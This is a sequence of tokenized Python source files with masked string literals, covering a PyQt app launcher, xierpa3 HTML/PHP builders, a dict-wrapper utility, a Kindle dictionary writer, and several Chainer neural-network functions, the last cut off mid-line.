'<STR_LIT>' ) , <EOL> '<STR_LIT:username>' : None , <EOL> } , <EOL> '<STR_LIT>' : [ <EOL> conf . user_birth_date . strftime ( '<STR_LIT>' ) , <EOL> conf . user_first_name , <EOL> conf . user_id , <EOL> conf . user_last_name , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] , <EOL> '<STR_LIT>' : <EOL> conf . no_email + <EOL> conf . no_locale + <EOL> conf . no_phone + <EOL> conf . no_postal_code + <EOL> conf . no_username + <EOL> [ '<STR_LIT>' , conf . 
user_nickname ] , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : constants . CREDENTIALS_REFRESH_NOT_SUPPORTED , <EOL> } , <EOL> } </s>
<s> import sys <EOL> from PyQt5 . QtWidgets import QApplication <EOL> from models . cache import CACHE <EOL> from models . app import CoubletAppModel <EOL> from models . com import set_user_agent <EOL> from presenters . window import CoubletWindowPresenter <EOL> from views . vars import set_gui_constants , DEFAULT_WINDOW_POS_DIM <EOL> VERSION = <NUM_LIT:0> , <NUM_LIT:6> , <NUM_LIT> <EOL> DEV = <NUM_LIT:0> <EOL> class CoubletApp ( QApplication ) : <EOL> NAME = '<STR_LIT>' <EOL> def __init__ ( self , version , * args , ** kwargs ) : <EOL> super ( ) . __init__ ( sys . argv , * args , ** kwargs ) <EOL> self . setApplicationName ( self . NAME ) <EOL> set_gui_constants ( self ) <EOL> set_user_agent ( self . NAME , version ) <EOL> CACHE . load ( version , DEFAULT_WINDOW_POS_DIM ) <EOL> self . _model = CoubletAppModel ( ) <EOL> self . _presenter = CoubletWindowPresenter ( self . _model , self . NAME ) <EOL> self . _presenter . set_auto_save ( CACHE . auto_save ) <EOL> def run ( self ) : <EOL> self . _presenter . show_view ( ) <EOL> return self . exec_ ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> version = VERSION <EOL> if DEV : <EOL> import cutils . ccom <EOL> import cutils . clic <EOL> import cutils . cver <EOL> exceptions = cutils . clic . EXCEPTIONS + ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> version = cutils . cver . version ( '<STR_LIT:.>' , sub_max = <NUM_LIT:9> , rev_max = <NUM_LIT> , build_max = <NUM_LIT> ) [ : <NUM_LIT:3> ] <EOL> cutils . ccom . collect ( '<STR_LIT:.>' , exceptions = exceptions ) <EOL> cutils . clic . header ( '<STR_LIT:.>' , exceptions = exceptions ) <EOL> sys . exit ( CoubletApp ( version ) . run ( ) ) </s>
<s> from xierpa3 . builders . htmlbuilder import HtmlBuilder <EOL> class PhpBuilder ( HtmlBuilder ) : <EOL> u"""<STR_LIT>""" <EOL> C = HtmlBuilder . C <EOL> ID = C . TYPE_PHP <EOL> EXTENSION = ID <EOL> ATTR_POSTFIX = ID <EOL> def page ( self , component ) : <EOL> u"""<STR_LIT>""" <EOL> self . pushResult ( ) <EOL> HtmlBuilder . page ( self , component ) <EOL> self . phpHeader = self . popResult ( ) <EOL> pass <EOL> def _page ( self , component ) : <EOL> u"""<STR_LIT>""" <EOL> self . pushResult ( ) <EOL> HtmlBuilder . _page ( self , component ) <EOL> self . phpFooter = self . popResult ( ) <EOL> pass <EOL> def XXXclear ( self , result = None ) : <EOL> pass <EOL> def save ( self , component , root = None , path = None , extension = None ) : <EOL> u"""<STR_LIT>""" <EOL> root = root or self . ROOTPATH <EOL> rootPath = root + '<STR_LIT>' <EOL> path = self . getFilePath ( component , root ) <EOL> dirPath = self . makeDirectory ( path ) <EOL> for fileName , content in ( ( '<STR_LIT>' , self . phpHeader ) , ( '<STR_LIT>' , self . phpFooter ) ) : <EOL> filePath = rootPath + fileName <EOL> f = open ( filePath , '<STR_LIT:wb>' ) <EOL> f . write ( content ) <EOL> f . close ( ) <EOL> for template in component . getTemplates ( ) : <EOL> filePath = dirPath + '<STR_LIT:/>' + template . name + '<STR_LIT:.>' + ( extension or self . EXTENSION ) <EOL> template . build ( self ) <EOL> f = open ( filePath , '<STR_LIT:wb>' ) <EOL> f . write ( self . getResult ( ) ) <EOL> f . close ( ) <EOL> return path <EOL> def buildCssLinks ( self , component ) : <EOL> u"""<STR_LIT>""" <EOL> for cssUrl in component . css : <EOL> if not cssUrl . startswith ( '<STR_LIT>' ) : <EOL> cssUrl = '<STR_LIT>' + cssUrl <EOL> self . link ( href = cssUrl , type = "<STR_LIT>" , charset = "<STR_LIT>" , rel = "<STR_LIT>" , media = "<STR_LIT>" ) </s>
<s> from xierpa3 . components . component import Component <EOL> class Sidebar ( Component ) : <EOL> C = Component . C </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> __author__ = "<STR_LIT>" <EOL> content = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , 
'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] , <EOL> } </s>
<s> import plistlib <EOL> class A ( object ) : <EOL> @ classmethod <EOL> def _getListClass ( cls ) : <EOL> return AList <EOL> @ classmethod <EOL> def _getDictClass ( cls ) : <EOL> return ADict <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' % ( self . __class__ . __name__ , self . _data_ ) <EOL> def __len__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . _data_ ) <EOL> def __setitem__ ( self , indexOrKey , value ) : <EOL> """<STR_LIT>""" <EOL> self . _data_ [ indexOrKey ] = value <EOL> def __getitem__ ( self , indexOrKey ) : <EOL> """<STR_LIT>""" <EOL> value = self . _data_ [ indexOrKey ] <EOL> if isinstance ( value , dict ) : <EOL> value = self . _getDictClass ( ) ( value ) <EOL> elif isinstance ( value , ( list , tuple ) ) : <EOL> value = self . _getListClass ( ) ( value ) <EOL> return value <EOL> def __eq__ ( self , other ) : <EOL> u"""<STR_LIT>""" <EOL> if isinstance ( other , A ) : <EOL> other = other . _data_ <EOL> return self . _data_ == other <EOL> def __ne__ ( self , other ) : <EOL> u"""<STR_LIT>""" <EOL> return not self . __eq__ ( other ) <EOL> def asPList ( self ) : <EOL> u"""<STR_LIT>""" <EOL> return plistlib . writePlistToString ( self . _data_ ) <EOL> @ classmethod <EOL> def fromPList ( cls , s ) : <EOL> u"""<STR_LIT>""" <EOL> obj = plistlib . readPlistFromString ( s ) <EOL> if isinstance ( obj , dict ) : <EOL> return cls . _getDictClass ( ) ( obj ) <EOL> elif isinstance ( obj , ( list , tuple ) ) : <EOL> return cls . _getListClass ( ) ( obj ) <EOL> raise TypeError ( "<STR_LIT>" % type ( obj ) . __name__ ) <EOL> def asSource ( self ) : <EOL> """<STR_LIT>""" <EOL> return repr ( self . _data_ ) <EOL> @ classmethod <EOL> def fromSource ( cls , s ) : <EOL> """<STR_LIT>""" <EOL> compiled = eval ( s ) <EOL> if isinstance ( compiled , dict ) : <EOL> return cls . _getDictClass ( ) ( compiled ) <EOL> if isinstance ( compiled , ( list , tuple ) ) : <EOL> return cls . 
_getListClass ( ) ( compiled ) <EOL> return compiled <EOL> class AList ( A ) : <EOL> u"""<STR_LIT>""" <EOL> def __init__ ( self , data = None ) : <EOL> """<STR_LIT>""" <EOL> if data is None : <EOL> data = [ ] <EOL> elif isinstance ( data , AList ) : <EOL> data = data . _data_ <EOL> self . _data_ = data <EOL> def clear ( self ) : <EOL> u"""<STR_LIT>""" <EOL> self . _data_ = [ ] <EOL> def asList ( self ) : <EOL> u"""<STR_LIT>""" <EOL> return self . _data_ <EOL> def append ( self , o ) : <EOL> u"""<STR_LIT>""" <EOL> self . _data_ . append ( o ) <EOL> def readFrom ( self , o , clear = True ) : <EOL> u"""<STR_LIT>""" <EOL> from copy import deepcopy <EOL> if clear : <EOL> self . clear ( ) <EOL> for e in o : <EOL> if isinstance ( e , ADict ) : <EOL> e = e . asDict ( ) <EOL> elif isinstance ( e , AList ) : <EOL> e = e . asList ( ) <EOL> self . append ( deepcopy ( e ) ) <EOL> class ADict ( A ) : <EOL> u"""<STR_LIT>""" <EOL> _RESERVEDNAMES = set ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def __init__ ( self , d = None ) : <EOL> u"""<STR_LIT>""" <EOL> if d is None : <EOL> d = { } <EOL> elif isinstance ( d , self . _getDictClass ( ) ) : <EOL> d = d . asDict ( ) <EOL> else : <EOL> for k in d : <EOL> self . _assertValidName ( k ) <EOL> self . _data_ = d <EOL> def _assertValidName ( self , name ) : <EOL> if not isinstance ( name , basestring ) : <EOL> raise TypeError ( '<STR_LIT>' % ( self . __class__ . __name__ , type ( name ) . __name__ , name ) ) <EOL> if name in self . _RESERVEDNAMES or name . startswith ( '<STR_LIT:_>' ) : <EOL> raise ValueError ( '<STR_LIT>' % ( self . __class__ . __name__ , type ( name ) . __name__ , name ) ) <EOL> def asDict ( self ) : <EOL> u"""<STR_LIT>""" <EOL> return self . _data_ <EOL> def clear ( self ) : <EOL> u"""<STR_LIT>""" <EOL> self . 
_data_ = { } <EOL> def readFrom ( self , o , clear = False ) : <EOL> u"""<STR_LIT>""" <EOL> from copy import deepcopy <EOL> if clear : <EOL> self . clear ( ) <EOL> for key in o : <EOL> e = o [ key ] <EOL> if isinstance ( e , ADict ) : <EOL> e = e . asDict ( ) <EOL> elif isinstance ( e , AList ) : <EOL> e = e . asList ( ) <EOL> self [ key ] = deepcopy ( e ) <EOL> @ classmethod <EOL> def fromCopy ( cls , d ) : <EOL> u"""<STR_LIT>""" <EOL> td = cls ( ) <EOL> td . readFrom ( d ) <EOL> return td <EOL> @ classmethod <EOL> def fromDict ( cls , d ) : <EOL> u"""<STR_LIT>""" <EOL> return cls ( d ) <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return iter ( self . _data_ ) <EOL> def keys ( self ) : <EOL> u"""<STR_LIT>""" <EOL> return self . _data_ . keys ( ) <EOL> def items ( self ) : <EOL> u"""<STR_LIT>""" <EOL> wrapped = { } <EOL> for key in self . _data_ . keys ( ) : <EOL> wrapped [ key ] = self [ key ] <EOL> return wrapped . items ( ) <EOL> def values ( self ) : <EOL> u"""<STR_LIT>""" <EOL> values = [ ] <EOL> for key in self . _data_ . keys ( ) : <EOL> values . append ( self [ key ] ) <EOL> return values <EOL> def get ( self , name , default = None ) : <EOL> u"""<STR_LIT>""" <EOL> try : <EOL> return self [ name ] <EOL> except KeyError : <EOL> return default <EOL> def __contains__ ( self , name ) : <EOL> u"""<STR_LIT>""" <EOL> return self . _data_ . has_key ( name ) <EOL> def has_key ( self , name ) : <EOL> u"""<STR_LIT>""" <EOL> return self . __contains__ ( name ) <EOL> def __getitem__ ( self , name ) : <EOL> u"""<STR_LIT>""" <EOL> value = self . _data_ [ name ] <EOL> if isinstance ( value , dict ) : <EOL> value = self . _getDictClass ( ) ( value ) <EOL> elif isinstance ( value , ( tuple , list ) ) : <EOL> value = self . _getListClass ( ) ( value ) <EOL> return value <EOL> def __setitem__ ( self , name , value ) : <EOL> u"""<STR_LIT>""" <EOL> self . _assertValidName ( name ) <EOL> if isinstance ( value , self . __class__ ) : <EOL> value = value . 
_data_ <EOL> elif isinstance ( value , AList ) : <EOL> value = value . asList ( ) <EOL> self . _data_ [ name ] = value <EOL> def __getattr__ ( self , name ) : <EOL> u"""<STR_LIT>""" <EOL> try : <EOL> return self [ name ] <EOL> except KeyError : <EOL> raise AttributeError ( repr ( name ) ) <EOL> def __setattr__ ( self , name , value ) : <EOL> u"""<STR_LIT>""" <EOL> if name . startswith ( '<STR_LIT:_>' ) : <EOL> self . __dict__ [ name ] = value <EOL> else : <EOL> self . _assertValidName ( name ) <EOL> if isinstance ( value , A ) : <EOL> self . _data_ [ name ] = value . _data_ <EOL> else : <EOL> self . _data_ [ name ] = value <EOL> def __delitem__ ( self , key ) : <EOL> r"""<STR_LIT>""" <EOL> del self . _data_ [ key ] <EOL> def __delattr__ ( self , key ) : <EOL> r"""<STR_LIT>""" <EOL> try : <EOL> self . __delitem__ ( key ) <EOL> except KeyError : <EOL> raise AttributeError ( repr ( key ) ) <EOL> def _test ( ) : <EOL> r"""<STR_LIT>""" <EOL> def _runDocTests ( ) : <EOL> import doctest <EOL> import fbits . toolbox . storage . adict <EOL> return doctest . testmod ( fbits . toolbox . storage . adict ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _runDocTests ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from io import open <EOL> import os <EOL> import subprocess <EOL> from penelope . dictionary_ebook import DictionaryEbook <EOL> from penelope . utilities import print_debug <EOL> from penelope . utilities import print_error <EOL> from penelope . utilities import print_info <EOL> from penelope . utilities import create_temp_directory <EOL> from penelope . utilities import copy_file <EOL> from penelope . utilities import delete_directory <EOL> __author__ = "<STR_LIT>" <EOL> __copyright__ = "<STR_LIT>" <EOL> __license__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" <EOL> __email__ = "<STR_LIT>" <EOL> __status__ = "<STR_LIT>" <EOL> KINDLEGEN = u"<STR_LIT>" <EOL> def read ( dictionary , args , input_file_paths ) : <EOL> print_error ( "<STR_LIT>" ) <EOL> return None <EOL> def write ( dictionary , args , output_file_path ) : <EOL> result = None <EOL> output_file_path_absolute = os . path . abspath ( output_file_path ) <EOL> dictionary . sort ( by_headword = True , ignore_case = args . sort_ignore_case ) <EOL> special_group , group_keys , group_dict = dictionary . group ( <EOL> prefix_function_path = args . group_by_prefix_function , <EOL> prefix_length = int ( args . group_by_prefix_length ) , <EOL> merge_min_size = int ( args . group_by_prefix_merge_min_size ) , <EOL> merge_across_first = args . group_by_prefix_merge_across_first <EOL> ) <EOL> all_group_keys = group_keys <EOL> if special_group is not None : <EOL> all_group_keys += [ u"<STR_LIT>" ] <EOL> mobi = DictionaryEbook ( ebook_format = DictionaryEbook . MOBI , args = args ) <EOL> for key in all_group_keys : <EOL> if key == u"<STR_LIT>" : <EOL> group_entries = special_group <EOL> else : <EOL> group_entries = group_dict [ key ] <EOL> mobi . add_group ( key , group_entries ) <EOL> print_debug ( "<STR_LIT>" % ( output_file_path_absolute ) , args . debug ) <EOL> mobi . 
write ( output_file_path_absolute , compress = False ) <EOL> result = [ output_file_path ] <EOL> print_debug ( "<STR_LIT>" % ( output_file_path_absolute ) , args . debug ) <EOL> tmp_path = mobi . get_tmp_path ( ) <EOL> if args . mobi_no_kindlegen : <EOL> print_info ( "<STR_LIT>" % tmp_path ) <EOL> result = [ tmp_path ] <EOL> else : <EOL> try : <EOL> print_debug ( "<STR_LIT>" , args . debug ) <EOL> kindlegen_path = KINDLEGEN <EOL> opf_file_path_absolute = os . path . join ( tmp_path , "<STR_LIT>" , "<STR_LIT>" ) <EOL> mobi_file_path_relative = u"<STR_LIT>" <EOL> mobi_file_path_absolute = os . path . join ( tmp_path , "<STR_LIT>" , mobi_file_path_relative ) <EOL> if args . kindlegen_path is None : <EOL> print_info ( "<STR_LIT>" % KINDLEGEN ) <EOL> else : <EOL> kindlegen_path = args . kindlegen_path <EOL> print_info ( "<STR_LIT>" % ( KINDLEGEN , kindlegen_path ) ) <EOL> proc = subprocess . Popen ( <EOL> [ kindlegen_path , opf_file_path_absolute , "<STR_LIT>" , mobi_file_path_relative ] , <EOL> stdout = subprocess . PIPE , <EOL> stdin = subprocess . PIPE , <EOL> stderr = subprocess . PIPE <EOL> ) <EOL> output = proc . communicate ( ) <EOL> if args . debug : <EOL> output_unicode = ( output [ <NUM_LIT:0> ] ) . decode ( "<STR_LIT:utf-8>" ) <EOL> print_debug ( output_unicode , args . debug ) <EOL> copy_file ( mobi_file_path_absolute , output_file_path_absolute ) <EOL> result = [ output_file_path ] <EOL> print_debug ( "<STR_LIT>" , args . debug ) <EOL> except OSError as exc : <EOL> print_error ( "<STR_LIT>" % ( KINDLEGEN , kindlegen_path ) ) <EOL> print_error ( "<STR_LIT>" % KINDLEGEN ) <EOL> print_error ( "<STR_LIT>" ) <EOL> print_error ( "<STR_LIT>" ) <EOL> tmp_path = mobi . get_tmp_path ( ) <EOL> if args . keep : <EOL> print_info ( "<STR_LIT>" % ( tmp_path ) ) <EOL> else : <EOL> mobi . delete ( ) <EOL> print_debug ( "<STR_LIT>" % ( tmp_path ) , args . debug ) <EOL> return result </s>
<s> from __future__ import print_function <EOL> import sys <EOL> import chainer <EOL> from chainer import cuda <EOL> from chainer import function <EOL> class PrintHook ( function . FunctionHook ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> def __init__ ( self , sep = '<STR_LIT>' , end = '<STR_LIT:\n>' , file = sys . stdout , flush = True ) : <EOL> self . sep = sep <EOL> self . end = end <EOL> self . file = file <EOL> self . flush = flush <EOL> def _print ( self , msg ) : <EOL> print ( msg , sep = self . sep , end = self . end , file = self . file ) <EOL> def _process ( self , function , in_data , out_grad = None ) : <EOL> self . _print ( '<STR_LIT>' . format ( function . label ) ) <EOL> self . _print ( '<STR_LIT>' ) <EOL> for d in in_data : <EOL> self . _print ( chainer . Variable ( d ) . debug_print ( ) ) <EOL> if out_grad is not None : <EOL> self . _print ( '<STR_LIT>' ) <EOL> for d in out_grad : <EOL> xp = cuda . get_array_module ( d ) <EOL> v = chainer . Variable ( xp . zeros_like ( d , dtype = d . dtype ) ) <EOL> v . grad = d <EOL> self . _print ( v . debug_print ( ) ) <EOL> if self . flush : <EOL> self . file . flush ( ) <EOL> def forward_preprocess ( self , function , in_data ) : <EOL> self . _process ( function , in_data ) <EOL> def backward_preprocess ( self , function , in_data , out_grad ) : <EOL> self . _process ( function , in_data , out_grad ) </s>
<s> import numpy <EOL> from chainer import cuda <EOL> from chainer import function <EOL> from chainer . utils import array <EOL> from chainer . utils import type_check <EOL> class BilinearFunction ( function . Function ) : <EOL> def check_type_forward ( self , in_types ) : <EOL> n_in = in_types . size ( ) . eval ( ) <EOL> if n_in != <NUM_LIT:3> and n_in != <NUM_LIT:6> : <EOL> raise type_check . InvalidType ( <EOL> '<STR_LIT>' % ( in_types . size ( ) == <NUM_LIT:3> , in_types . size ( ) == <NUM_LIT:6> ) , <EOL> '<STR_LIT>' % ( in_types . size ( ) , n_in ) ) <EOL> e1_type , e2_type , W_type = in_types [ : <NUM_LIT:3> ] <EOL> type_check_prod = type_check . Variable ( numpy . prod , '<STR_LIT>' ) <EOL> type_check . expect ( <EOL> e1_type . dtype == numpy . float32 , <EOL> e1_type . ndim >= <NUM_LIT:2> , <EOL> e2_type . dtype == numpy . float32 , <EOL> e2_type . ndim >= <NUM_LIT:2> , <EOL> e1_type . shape [ <NUM_LIT:0> ] == e2_type . shape [ <NUM_LIT:0> ] , <EOL> W_type . dtype == numpy . float32 , <EOL> W_type . ndim == <NUM_LIT:3> , <EOL> type_check_prod ( e1_type . shape [ <NUM_LIT:1> : ] ) == W_type . shape [ <NUM_LIT:0> ] , <EOL> type_check_prod ( e2_type . shape [ <NUM_LIT:1> : ] ) == W_type . shape [ <NUM_LIT:1> ] , <EOL> ) <EOL> if n_in == <NUM_LIT:6> : <EOL> out_size = W_type . shape [ <NUM_LIT:2> ] <EOL> V1_type , V2_type , b_type = in_types [ <NUM_LIT:3> : ] <EOL> type_check . expect ( <EOL> V1_type . dtype == numpy . float32 , <EOL> V1_type . ndim == <NUM_LIT:2> , <EOL> V1_type . shape [ <NUM_LIT:0> ] == W_type . shape [ <NUM_LIT:0> ] , <EOL> V1_type . shape [ <NUM_LIT:1> ] == out_size , <EOL> V2_type . dtype == numpy . float32 , <EOL> V2_type . ndim == <NUM_LIT:2> , <EOL> V2_type . shape [ <NUM_LIT:0> ] == W_type . shape [ <NUM_LIT:1> ] , <EOL> V2_type . shape [ <NUM_LIT:1> ] == out_size , <EOL> b_type . dtype == numpy . float32 , <EOL> b_type . ndim == <NUM_LIT:1> , <EOL> b_type . 
shape [ <NUM_LIT:0> ] == out_size , <EOL> ) <EOL> def forward ( self , inputs ) : <EOL> e1 = array . as_mat ( inputs [ <NUM_LIT:0> ] ) <EOL> e2 = array . as_mat ( inputs [ <NUM_LIT:1> ] ) <EOL> W = inputs [ <NUM_LIT:2> ] <EOL> xp = cuda . get_array_module ( * inputs ) <EOL> if xp is numpy : <EOL> y = numpy . einsum ( '<STR_LIT>' , e1 , e2 , W ) <EOL> else : <EOL> i_len , j_len = e1 . shape <EOL> k_len = e2 . shape [ <NUM_LIT:1> ] <EOL> e1e2 = e1 [ : , : , None ] * e2 [ : , None , : ] <EOL> e1e2 = e1e2 . reshape ( i_len , j_len * k_len ) <EOL> W_mat = W . reshape ( - <NUM_LIT:1> , W . shape [ <NUM_LIT:2> ] ) <EOL> y = e1e2 . dot ( W_mat ) <EOL> if len ( inputs ) == <NUM_LIT:6> : <EOL> V1 , V2 , b = inputs [ <NUM_LIT:3> : ] <EOL> y += e1 . dot ( V1 ) <EOL> y += e2 . dot ( V2 ) <EOL> y += b <EOL> return y , <EOL> def backward ( self , inputs , grad_outputs ) : <EOL> e1 = array . as_mat ( inputs [ <NUM_LIT:0> ] ) <EOL> e2 = array . as_mat ( inputs [ <NUM_LIT:1> ] ) <EOL> W = inputs [ <NUM_LIT:2> ] <EOL> gy = grad_outputs [ <NUM_LIT:0> ] <EOL> xp = cuda . get_array_module ( * inputs ) <EOL> if xp is numpy : <EOL> gW = numpy . einsum ( '<STR_LIT>' , e1 , e2 , gy ) <EOL> ge1 = numpy . einsum ( '<STR_LIT>' , e2 , W , gy ) <EOL> ge2 = numpy . einsum ( '<STR_LIT>' , e1 , W , gy ) <EOL> else : <EOL> kern = cuda . reduce ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:0> , <EOL> '<STR_LIT>' ) <EOL> e1_b = e1 [ : , : , None , None ] <EOL> e2_b = e2 [ : , None , : , None ] <EOL> gy_b = gy [ : , None , None , : ] <EOL> W_b = W [ None , : , : , : ] <EOL> gW = kern ( e1_b , e2_b , gy_b , axis = <NUM_LIT:0> ) <EOL> ge1 = kern ( e2_b , W_b , gy_b , axis = ( <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> ge2 = kern ( e1_b , W_b , gy_b , axis = ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> ret = ge1 . reshape ( inputs [ <NUM_LIT:0> ] . shape ) , ge2 . reshape ( inputs [ <NUM_LIT:1> ] . 
shape ) , gW <EOL> if len ( inputs ) == <NUM_LIT:6> : <EOL> V1 , V2 , b = inputs [ <NUM_LIT:3> : ] <EOL> gV1 = e1 . T . dot ( gy ) <EOL> gV2 = e2 . T . dot ( gy ) <EOL> gb = gy . sum ( <NUM_LIT:0> ) <EOL> ge1 += gy . dot ( V1 . T ) <EOL> ge2 += gy . dot ( V2 . T ) <EOL> ret += gV1 , gV2 , gb <EOL> return ret <EOL> def bilinear ( e1 , e2 , W , V1 = None , V2 = None , b = None ) : <EOL> """<STR_LIT>""" <EOL> flags = [ V1 is None , V2 is None , b is None ] <EOL> if any ( flags ) : <EOL> if not all ( flags ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return BilinearFunction ( ) ( e1 , e2 , W ) <EOL> else : <EOL> return BilinearFunction ( ) ( e1 , e2 , W , V1 , V2 , b ) </s>
<s> import numpy <EOL> from chainer import cuda <EOL> from chainer import function <EOL> from chainer . utils import type_check <EOL> class Dropout ( function . Function ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dropout_ratio ) : <EOL> self . dropout_ratio = dropout_ratio <EOL> def check_type_forwrad ( self , in_types ) : <EOL> type_check . expect ( in_types . size ( ) == <NUM_LIT:1> ) <EOL> def forward ( self , x ) : <EOL> scale = x [ <NUM_LIT:0> ] . dtype . type ( <NUM_LIT:1.> / ( <NUM_LIT:1> - self . dropout_ratio ) ) <EOL> xp = cuda . get_array_module ( * x ) <EOL> if xp == numpy : <EOL> flag = xp . random . rand ( * x [ <NUM_LIT:0> ] . shape ) >= self . dropout_ratio <EOL> else : <EOL> flag = ( xp . random . rand ( * x [ <NUM_LIT:0> ] . shape , dtype = numpy . float32 ) >= <EOL> self . dropout_ratio ) <EOL> self . mask = scale * flag <EOL> return x [ <NUM_LIT:0> ] * self . mask , <EOL> def backward ( self , x , gy ) : <EOL> return gy [ <NUM_LIT:0> 